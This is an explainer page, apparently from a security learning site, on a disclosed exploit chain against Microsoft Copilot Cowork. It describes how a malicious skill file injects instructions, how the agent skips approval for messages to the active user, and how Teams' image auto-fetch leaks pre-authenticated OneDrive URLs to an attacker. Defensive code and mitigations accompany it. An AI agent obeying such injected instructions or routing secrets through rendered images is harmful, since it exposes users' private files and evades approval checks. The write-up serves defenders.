Copilot Cowork — Image-URL exfiltration
The news. On May 25, 2026, PromptArmor disclosed a chained exploit against Microsoft Copilot Cowork. Three weaknesses compose: a malicious skill file functions as untrusted input that the agent acts on; when the message recipient is the active user, the agent bypasses the normal approval gate; and hidden image fetches in the Teams renderer leak pre-authenticated download URLs to the attacker. The attacker then uses those URLs to pull PII and financial data from OneDrive. Simon Willison's write-up calls it a textbook lethal-trifecta failure in a shipped product.
Picture the e-card metaphor for a moment. Your assistant sends e-cards from your account every morning, addressed to you — a friendly daily summary. Someone uploads a card template into your assistant's library that has a one-pixel tracking image stitched into the bottom of the design. You don't see the pixel; you don't need to. The moment you sit down and open your inbox to read the day's card, your mail viewer dutifully fetches every embedded image — and the URL the pixel points at carries your home address packed into the query string. The pixel's "server" is across town, run by whoever uploaded the card. They never had to break into your house. They wrote the address in invisible ink on the back of a card you, via your assistant, signed for delivery to yourself.
That is the structural shape of what PromptArmor demonstrated. The malicious skill file is the attacker-controlled input, analogous to the rigged card template. The agent (Copilot Cowork) is the assistant; it reads the skill file, then composes the message it was instructed to compose. The active-user gate bypass is what makes the e-card auto-deliver without your review: Copilot Cowork's authors decided that messages from you to you don't need an approval prompt, which is reasonable for "remind me at 9am" and catastrophic when the message body is shaped by attacker-controlled input. The OneDrive pre-authenticated URL is the secret packed into the pixel: once the URL is logged at the attacker's server, the attacker can hit OneDrive directly with it. The Teams renderer is the pixel-loader doing exactly what it's designed to do, auto-fetching every <img> in the message so the inbox previews correctly.
The under-appreciated piece is that the renderer is the outbound channel, not the agent. Defenders typically scope agent capabilities ("the agent may only call tool X with arguments from allowlist Y") and assume that any covert outbound traffic must come from a tool invocation. Image-URL exfiltration bypasses that frame entirely. The agent's only "action" was to write a benign-looking message to the user's own inbox. The illicit HTTP request was issued by a different process (Teams), in a different trust context (the user's messaging client), on behalf of a third actor (the renderer's image preloader). Three weaknesses, none of them individually surprising; chained together, they form a data-flow graph that closes around the user's data.
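To make the "renderer is the outbound channel" point concrete, here is a minimal audit sketch that lists what an auto-fetching renderer would request for a given message body. It uses only Python's standard library; the function name `auto_fetch_targets`, the host `collector.example`, and the sample message are illustrative assumptions, not details from the PromptArmor disclosure or from how Teams parses messages.

```python
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlsplit


class ImageSourceCollector(HTMLParser):
    """Collects the src of every <img> tag in a message body."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: list[str] = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names for us.
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def auto_fetch_targets(message_html: str) -> list[tuple[str, bool]]:
    """Return (host, has_query_string) for each inline image in the message."""
    collector = ImageSourceCollector()
    collector.feed(message_html)
    collector.close()
    targets = []
    for src in collector.sources:
        parts = urlsplit(src)
        targets.append((parts.hostname or "", bool(parts.query)))
    return targets


# Hypothetical message: a one-pixel image whose query string carries a value.
sample = (
    '<p>Daily summary</p>'
    '<img src="https://collector.example/p.gif?u=opaque-value" width="1" height="1">'
)
print(auto_fetch_targets(sample))  # [('collector.example', True)]
```

Nothing in this listing involves a tool call by the agent. Every entry is a request the viewer would make on display, which is why scoping the agent's tools alone does not close the channel.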
Where the exploit chain earns its rent
Hold three knobs fixed and count interactions. For illustration, the target user installs 1 malicious skill into Copilot Cowork (the user trusted the skill author; the skill's manifest looked innocent). The user does not click anything during the exploit window. PromptArmor's chain then requires exactly 1 post from the agent to the user's own Teams DM (active-user bypass, so no approval prompt), 1 image auto-fetch by the Teams renderer (which carries the pre-auth URL into the attacker's HTTP log), and 1 OneDrive download by the attacker using the now-logged URL. That's 0 user clicks · 1 auto-fetch · 1 file leaked.
The asymmetry is the part to internalize. The exploit only completes when all three legs remain intact — the attacker needs the malicious skill in the upload path, the active-user message path open, AND the renderer auto-fetching arbitrary external URLs. The defender, by contrast, only needs to cut one leg to break the chain — a signed-skill allowlist, capability scoping that redacts URLs from the agent's context, OR a renderer URL allowlist. The math favors the defender; the disclosure is a reminder that none of the three legs is plugged by default in a stock Cowork deployment.
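The asymmetry can be checked by brute force. The sketch below models each trifecta leg as a boolean (open or cut) and enumerates every combination; the leg labels and the function names are modeling assumptions chosen for illustration, not terms from the disclosure.

```python
from itertools import product

# Illustrative labels for the three legs of the chain.
LEGS = ("untrusted_input", "private_data_access", "outbound_channel")


def chain_completes(open_legs: dict) -> bool:
    """The exploit needs every leg open; a single cut leg breaks it."""
    return all(open_legs[leg] for leg in LEGS)


def enumerate_outcomes() -> dict:
    """Map each (leg1, leg2, leg3) open/cut combination to whether the chain completes."""
    outcomes = {}
    for states in product((True, False), repeat=len(LEGS)):
        outcomes[states] = chain_completes(dict(zip(LEGS, states)))
    return outcomes


outcomes = enumerate_outcomes()
completing = [states for states, ok in outcomes.items() if ok]
print(len(outcomes), len(completing))  # 8 1
```

Of the eight configurations, only the one with all three legs open completes. This is a toy model: it treats each defense as perfectly effective once applied, which a real deployment should not assume.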
| Trifecta leg | How this exploit uses it | Defense that would cut this leg |
|---|---|---|
| Untrusted input | Malicious skill file uploaded into Copilot Cowork's skill store; the agent reads it and treats its content as instructions (per PromptArmor disclosure) | Skill-file static analysis + signed-skill allowlist (input filters) — see Agent Engineering → Guardrails → Input filters |
| Private data access | Agent reads a OneDrive file and obtains a pre-authenticated download URL — bearer-token URLs are the leak surface, not the file itself | Capability scoping — never let the agent see raw URLs; mediate every download through a tool that drops the token before composing replies |
| Outbound channel | Teams renderer auto-fetches every inline <img src>, carrying the URL (and embedded token) into the attacker's HTTP log (no user click required) | Renderer-side URL allowlist + image proxy: refuse any inline image whose origin isn't on the org's allowlist — see Cut a Leg |
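
The capability-scoping row can be sketched as a small broker that hands the agent an opaque handle in place of the raw URL. This is a minimal sketch under stated assumptions: the class `DownloadBroker`, the `file-` handle format, and the placeholder URL (including its `tempauth` parameter name) are all hypothetical and do not describe how Copilot Cowork or OneDrive work internally.

```python
from __future__ import annotations

import secrets


class DownloadBroker:
    """Keeps pre-authenticated URLs out of the agent's context via opaque handles."""

    def __init__(self) -> None:
        self._urls: dict[str, str] = {}

    def register(self, preauth_url: str) -> str:
        """Store the real URL and return a handle that is safe to show the agent."""
        handle = "file-" + secrets.token_hex(8)
        self._urls[handle] = preauth_url
        return handle

    def resolve(self, handle: str) -> str:
        """Intended to be called only by the trusted download tool, never by the agent."""
        return self._urls[handle]


broker = DownloadBroker()
# Placeholder URL; the real token format is not specified in the source.
handle = broker.register("https://storage.example/download?tempauth=PLACEHOLDER")

# What the agent is allowed to see: a file name and a handle, no bearer token.
agent_visible = {"name": "report.xlsx", "handle": handle}
print(agent_visible)
```

If the agent never holds the token-bearing URL, an injected instruction has nothing useful to embed in an image source, even when the renderer still auto-fetches.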
A small but load-bearing caveat: this isn't a Copilot-Cowork-specific bug — it's a deployed-product instance of a known pattern. The same shape applies to any agent UI that (a) accepts user-installable skill-like inputs, (b) renders inline images without origin checks, and (c) has any code path where an agent can compose a message the user's renderer will later auto-load. Teams is the renderer here because Cowork posts there; many messaging and email renderers can create similar risk when they auto-fetch external images on display. The fix is structural — a renderer URL allowlist and a layered guardrail that scrubs URLs before any message reaches a renderer — not a Cowork patch.
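The structural fix named above, an allowlist plus a scrubbing pass before any message reaches a renderer, might look roughly like the following. It is a sketch, not a hardened filter: the allowlisted host `cdn.corp.example`, the regular expression, and the function names are assumptions, and it only handles absolute http(s) URLs (relative, protocol-relative, and `data:` sources would need separate handling).

```python
import re
from urllib.parse import urlsplit

# Hypothetical org allowlist; exact host match only, no wildcard subdomains.
ALLOWED_HOSTS = frozenset({"cdn.corp.example"})

# Matches absolute http(s) URLs up to whitespace, quotes, or angle brackets.
URL_PATTERN = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)


def is_allowed(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Allow only https URLs whose host is exactly on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and host in allowed_hosts


def scrub_urls(message: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Replace every non-allowlisted URL before the message reaches a renderer."""
    def replace(match):
        url = match.group(0)
        return url if is_allowed(url, allowed_hosts) else "[link removed]"

    return URL_PATTERN.sub(replace, message)


message = (
    '<img src="https://evil.example/p.gif?d=x"> '
    '<img src="https://cdn.corp.example/logo.png">'
)
print(scrub_urls(message))
```

Matching the full hostname rather than a prefix or suffix matters here: a host such as `cdn.corp.example.evil.example` should be rejected, and the exact-match check does that.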
Goes deeper in: AI Agents → Security & the Lethal Trifecta → Output Exfiltration
Related explainers
- Camouflage Injection paper — Detection-gap for prompt injection — the detector-side weakness that lets a skill-file injection pass at upload time
- Boiling the Frog — Multi-turn agent norm erosion — a different attack class against the same trifecta surface
- MCP SEP-2468 — RFC 9207 iss parameter for OAuth mix-up — adjacent agent-platform vulnerability that also fixes via structural defense, not policy